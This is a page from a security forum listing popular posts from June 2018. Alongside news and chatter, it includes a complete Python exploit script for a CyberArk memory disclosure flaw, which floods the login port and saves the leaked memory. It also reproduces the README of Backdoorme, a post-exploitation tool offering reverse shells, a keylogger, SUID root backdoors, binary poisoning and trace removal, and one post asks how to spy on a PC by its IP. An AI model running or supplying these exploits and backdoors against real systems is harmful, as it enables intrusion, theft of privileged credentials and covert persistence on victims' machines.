Leaderboard

Popular Content

Showing content with the highest reputation on 06/04/18 in all areas

  1. It looks like registration has opened for Defcamp 2018: https://def.camp/tickets/ You can also sign up for the Call for Papers if you want to present: https://def.camp/call-for-papers/ If there are any questions, @Andrei can help you.
    4 points
  2. Who cares about him... Tell us, is the coffee vending machine okay?
    4 points
  3. tex was killed in Germany, the people at MAE confirmed it too. Some immigrants cut him up over a coffee vending machine. RIP!
    3 points
  4. Here's the biggest news of the week—Microsoft has reportedly acquired GitHub for $7.5 billion.

     For those unaware, GitHub is a popular code repository hosting service that allows developers to host their projects, documentation, and code in the cloud using the popular Git source management system, invented in 2005 by Linux founder Linus Torvalds.

     GitHub is used by many developers and big tech companies including Apple, Amazon, Google, Facebook, and IBM to store their corporate code and privately collaborate on software, but Microsoft is one of the top contributors to the web-hosting service. Microsoft has uploaded several of its most important projects, including PowerShell, the .NET framework, and the Microsoft Edge JavaScript engine, to the website under open source licenses. Microsoft also partnered with Canonical to bring Ubuntu to Windows 10.

     Citing sources familiar with the matter, Bloomberg reports that GitHub opted to sell to Microsoft in part because it was impressed with the performance and leadership of Microsoft's CEO Satya Nadella, who has pushed the company to embrace open source technology.

     In a blog post published today, Microsoft has confirmed that it will acquire GitHub for $7.5 billion in Microsoft stock, and the deal is expected to close by the end of 2018.

     "GitHub will retain its developer-first ethos and will operate independently to provide an open platform for all developers in all industries. Developers will continue to be able to use the programming languages, tools and operating systems of their choice for their projects — and will still be able to deploy their code to any operating system, any cloud and any device."

     "Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub's current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives."

     GitHub was last valued at $2 billion in 2015.

     However, the decision has brought fear among some developers in the open source community, with some Twitter users proclaiming the death of GitHub and open source software, and many considering switching to rival services such as BitBucket or GitLab. The concern is completely rational and understandable. Despite the company's lack of a CEO and money woes, GitHub holds a privileged position in the software development ecosystem and plays a critical role. GitHub is, no doubt, a hub of the open source world, with 80 million code repositories hosted on the site as of March 2018.

     Microsoft, on the other hand, once opposed such open-source software development, with its ex-CEO Steve Ballmer describing Linux as "cancer." However, Nadella moved the company away from complete dependence on its Windows OS to more in-house development on Linux. Microsoft even brought Linux to Windows, via the Windows Subsystem for Linux.

     Microsoft's largest acquisition to date was LinkedIn, the job-oriented professional social network it acquired in 2015 for $26 billion, and many people are now concerned that the massive investment in LinkedIn will start to pay off for Microsoft. With both LinkedIn and GitHub, Microsoft is in a position to expand and strengthen LinkedIn. Also, the acquisition will give Microsoft access to a wealth of data and millions of software developers.

     https://thehackernews.com/2018/06/microsoft-acquires-github.html
    2 points
  5. Law enforcement say the attacker has a criminal record and was inspired by the series Breaking Bad -
    2 points
  6. CyberArk versions prior to 10 suffer from a memory disclosure vulnerability. # Exploit Title: CyberArk < 10 - Memory Disclosure # Date: 2018-06-04 # Exploit Author: Thomas Zuk # Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/ # Version: < 9.7 and < 10 # Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10 # CVE: CVE-2018-9842 # Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd # paste the following bytes into a hexedited file named logon.bin: #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 #!/usr/bin/python import socket import os import sys ip = "10.107.32.21" port = 1858 # Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services. # The below is a sample login request that is needed to receive the memory pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00" for iteration in range(0, 110): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, 
port)) s.send(pacli_logon) # recieve response s.recv(200) reply = s.recv(1500) # write responses to file file = open("cyberark_memory", "a") file.write("received: \n") file.write(reply) file.write("\n\n\n") file.close() s.close() Source
    1 point
  7. You need willpower and the drive to put your back into it to learn something, what the fuck are you waiting for? Confirmation from some users in public on whether to start and how to start? If you want to start, you look up on your own what you need and you begin; if not, you keep going with questions like these and others will come along to stick their oar in as well.
    1 point
  8. Burp Bounty is an extension of Burp Suite that improves the active and passive scanner by yourself. This extension requires Burp Suite Pro.

     Burp Bounty v1.0

     This extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.

     Usage:

     1. Config section

        Profile Manager: you can manage the profiles, enable, disable or remove any of them.
        Select Profile: you can choose any profile, to modify it and save.
        Profiles reload: you can reload the profiles directory, for example, when you add a new external profile to the directory.
        Profile Directory: you choose the profiles directory path.

     2. Payloads

        You can add as many payloads as you want. Each payload of this section will be sent at each entry point (insertion points provided by the burp api).

        You can choose multiple Encoders. For example, if you want to encode the string alert(1) many times (in descending order):

        Plain text: alert(1)
        HTML-encode all characters: &#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;
        URL-encode all characters: %26%23%78%36%31%3b%26%23%78%36%63%3b%26%23%78%36%35%3b%26%23%78%37%32%3b%26%23%78%37%34%3b%26%23%78%32%38%3b%26%23%78%33%31%3b%26%23%78%32%39%3b
        Base64-encode: JTI2JTIzJTc4JTM2JTMxJTNiJTI2JTIzJTc4JTM2JTYzJTNiJTI2JTIzJTc4JTM2JTM1JTNiJTI2JTIzJTc4JTM3JTMyJTNiJTI2JTIzJTc4JTM3JTM0JTNiJTI2JTIzJTc4JTMyJTM4JTNiJTI2JTIzJTc4JTMzJTMxJTNiJTI2JTIzJTc4JTMyJTM5JTNi

        If you choose the "URL-Encode these characters" option, you can put all the characters that you want to encode with URL.

     3. Grep - Match

        For each payload response, each string, regex or payload (depending on what you choose) will be searched with the specific Grep Options.

        Grep Type:
        Simple String: search for a simple string or strings
        Regex: search for a regular expression
        Payload: search for the payloads sent
        Payload without encode: if you encode the payload, and you want to find the original payload, you should choose this

        Grep Options:
        Negative match: if you want to find whether the string, regex or payload is not present in the response
        Case sensitive: only match if case sensitive
        Not in cookie: if you want to find whether any cookie attribute is not present
        Content type: you can specify one or multiple (separated by comma) content types in which to search for the string, regex or payload. For example: text/plain, text/html, ...
        Response Code: you can specify one or multiple (separated by comma) HTTP response codes in which to find the string, regex or payload. For example: 300, 302, 400, ...

     4. Write an Issue

        In this section you can specify the issue that will be shown if the condition matches the options specified.

        Issue Name
        Severity
        Confidence
        And other details like description, background, etc.

     Examples:

     So, the vulnerabilities identified so far, from which you can make personalized improvements, are:

     1. Active scan

        XSS reflected and Stored
        SQL Injection error based
        XXE
        Command injection
        Open Redirect
        Local File Inclusion
        Remote File Inclusion
        Path Traversal
        LDAP Injection
        ORM Injection
        XML Injection
        SSI Injection
        XPath Injection
        etc

     2. Passive scan

        Security Headers
        Cookies attributes
        Software versions
        Error strings
        In general any string or regular expression.

     Improvements for version 2.0:

        Add the burpcollaborator, to find blind vulnerabilities
        Follow redirects and how many to follow
        Processing cookies in redirect
        Regular expression in content type
        Response codes to avoid
        Content type to avoid
        Search only in HTTP Headers
        Exclude HTTP headers from the search
        Add option to insert new headers in the requests.

     Download: BurpBounty-master.zip
    1 point
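
The encoder chain from the Burp Bounty post above, reproduced as an added example (not part of the post or of Burp Bounty's code), together with the reverse step a filter or log search needs before it can match the original string. The function names are hypothetical, and the Base64 detection in `peel_layers` is a heuristic.

```python
import base64
import html
import re
from urllib.parse import unquote

def html_encode_all(s):
    """HTML-encode every character as a hex entity ('a' becomes '&#x61;')."""
    return "".join("&#x%x;" % ord(c) for c in s)

def url_encode_all(s):
    """URL-encode every byte with lower-case hex, as in the post's sample."""
    return "".join("%%%02x" % b for b in s.encode("utf-8"))

def encode_chain(payload):
    """Apply the post's order: HTML entities, then URL-encoding, then Base64."""
    step1 = html_encode_all(payload)
    step2 = url_encode_all(step1)
    step3 = base64.b64encode(step2.encode("ascii")).decode("ascii")
    return step1, step2, step3

_B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def peel_layers(value, max_rounds=8):
    """Undo nested Base64 / URL / HTML-entity encoding until the value is stable."""
    for _ in range(max_rounds):
        before = value
        # Heuristic: only treat the value as Base64 if it decodes to printable ASCII.
        if len(value) % 4 == 0 and _B64.match(value):
            try:
                decoded = base64.b64decode(value, validate=True).decode("ascii")
                if decoded.isprintable():
                    value = decoded
            except ValueError:
                pass  # not Base64 after all (also covers non-ASCII results)
        value = html.unescape(unquote(value))
        if value == before:
            break
    return value

if __name__ == "__main__":
    for layer in encode_chain("alert(1)"):
        print(layer)
    print(peel_layers(encode_chain("alert(1)")[2]))
```
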
  9. for now they haven't issued a statement about the vending machine either. it was a good one brought from RO, the guy had the coffee..... it was a brand-name one, supposedly....
    1 point
  10. give me a fucking break, I started at 9 and by 15 I already knew programming fairly well (I'd say). don't give me that crap, you're just judging subjectively from your own case.
    1 point
  11. Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time. Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained.

     Please only use Backdoorme with explicit permission - please don't hack without asking.

     Usage

     Backdoorme is split into two parts: backdoors and modules. Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety. Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence.

     Setup

     To start backdoorme, first ensure that you have the required dependencies.

     For Python 3.5+:

         $ sudo apt-get install python3 python3-pip python3-tk nmap
         $ cd backdoorme/
         $ virtualenv --python=python3.5 env
         $ source env/bin/activate
         (env) $ pip install -r requirements.txt

     For Python 2.7:

         $ sudo python dependencies.py

     Getting Started

     Launching backdoorme:

         $ python master.py

     To add a target:

         >> addtarget
         Target Hostname: 10.1.0.2
         Username: victim
         Password: password123
          + Target 1 Set!
         >>

     Backdoors

     To use a backdoor, simply run the "use" keyword.

         >> use shell/metasploit
          + Using current target 1.
          + Using Metasploit backdoor...
         (msf) >>

     From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.

         (msf) >> show options
         Backdoor options:

         Option   Value   Description            Required
         ------   -----   -----------            --------
         name     initd   name of the backdoor   False
         ...

         (msf) >> set name apache
          + name => apache
         (msf) >> show options
         Backdoor options:

         Option   Value    Description            Required
         ------   -----    -----------            --------
         name     apache   name of the backdoor   False
         ...

     As in metasploit, backdoors are organized by category.

     Auxiliary

         keylogger - Adds a keylogger to the system and gives the option to email results back to you.
         simplehttp - installs python's SimpleHTTP server on the client.
         user - adds a new user to the target.
         web - installs an Apache Server on the client.

     Escalation

         setuid - the SetUID backdoor works by setting the setuid bit on a binary while the user has root access, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unprivileged user and still be able to run nano (or any chosen binary) as root. ('nano /etc/shadow'). Note that root access is initially required to deploy this escalation backdoor.
         shell - the shell backdoor is a privilege escalation backdoor, similar to (but more specific than) its SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unprivileged user, simply run ".bash -p", and you will have root access.

     Shell

         bash - uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.
         bash2 - a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.
         sh - Similar to the first bash backdoor, but redirects input to /bin/sh.
         sh2 - Similar to the second bash backdoor, but redirects input to /bin/sh.
         metasploit - employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.
         java - creates a socket connection using libraries from Java and compiles the backdoor on the target.
         ruby - uses ruby's libraries to create a connection, then redirects to /bin/bash.
         netcat - uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.
         netcat_traditional - utilizes netcat-traditional's -e option to create a reverse shell.
         perl - a script written in perl which redirects output to bash, and renames the process to look less conspicuous.
         php - runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module.
         python - uses a short python script to perform commands and send output back to the user.
         web - ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.

     Access

         remove_ssh - removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces.
         ssh_key - creates RSA key and copies to target for a passwordless ssh connection.
         ssh_port - Adds a new port for ssh.

     Windows

         windows - Uses msfvenom to create a windows backdoor.

     Modules

     Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.

         (msf) >> add poison
          + Poison module added

     Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.

         (msf) >> help
         ...
         Poison module options:

         Option     Value   Description                         Required
         ------     -----   -----------                         --------
         name       ls      name of command to poison           False
         location   /bin    where to put poisoned files into    False

     Currently enabled modules include:

         Poison - Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor. For example, if the bin poisoning module is triggered with "ls", it would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently.
         Cron - Adds an existing backdoor to the root user's crontab to run with a given frequency.
         Web - Sets up a web server and places a web page which triggers the backdoor. Simply visit the site with your listener open and the backdoor will begin.
         User - Adds a new user to the target.
         Startup - Allows for backdoors to be spawned with the bashrc and init files.
         Whitelist - Whitelists an IP so that only that IP can connect to the backdoor.

     Targets

     Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available.

     Contributing

     Backdoorme is still very much in its infancy! Feel free to contribute to the project - simply fork it, make your changes, and issue a pull request. Have an idea for a killer backdoor, or something we could improve? Make an issue and we'll add it ASAP! Please email us at backdoormegit@gmail.com with any questions.

     If you wish to add your own backdoor, follow the directions given in the backdoorme/backdoors/template.py file. If you wish to add your own module, follow the directions given in the backdoorme/modules/template.py file.

     Cheat Sheet for developers:

         Execute command on system: self.core.curtarget.ssh.exec_command("command")
         Retrieve an option: self.get_value("option")
         Execute command on system with root: self.target.ssh.exec_command("echo " + self.core.curtarget.pword + " | sudo -S command")

     Source: https://github.com/Kkevsterrr/backdoorme
    1 point
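
From the defender's side, the two escalation backdoors described in the post above leave a SUID bit on an editor or on a hidden copy of a shell, which a filesystem audit can find. This is an added example, not code from Backdoorme; the `SENSITIVE_NAMES` list and the sample tree are assumptions constructed for the demonstration.

```python
import os
import stat
import tempfile

# Assumption: programs that have no reason to carry the SUID bit on a normal host.
SENSITIVE_NAMES = {"bash", "sh", "dash", "zsh", "nano", "vi", "vim"}

def audit_suid(root):
    """Return sorted (relative path, reason) pairs for suspicious SUID files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # file vanished or is unreadable
            if not (stat.S_ISREG(mode) and mode & stat.S_ISUID):
                continue
            if name.startswith("."):
                reason = "hidden SUID file"
            elif name in SENSITIVE_NAMES:
                reason = "SUID on shell or editor"
            else:
                continue  # other SUID files need a per-host baseline to judge
            findings.append((os.path.relpath(path, root), reason))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample: a SUID editor, a hidden SUID file and a normal binary."""
    layout = {"bin/nano": 0o4755, "home/user/.bash": 0o4755, "bin/ls": 0o0755}
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("placeholder\n")
        os.chmod(path, mode)

def demo():
    """Run the audit over the constructed tree in a temporary directory."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return audit_suid(root)

if __name__ == "__main__":
    for path, reason in demo():
        print(f"{reason}: {path}")
```

On a real host, point `audit_suid` at `/` (as root) and compare the remaining SUID files against a known-good baseline for that distribution.
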
  12. Hi! How can I find out exactly where a PC is located if I know its IP? And how could I see what he is doing on that PC at that moment?
    -2 points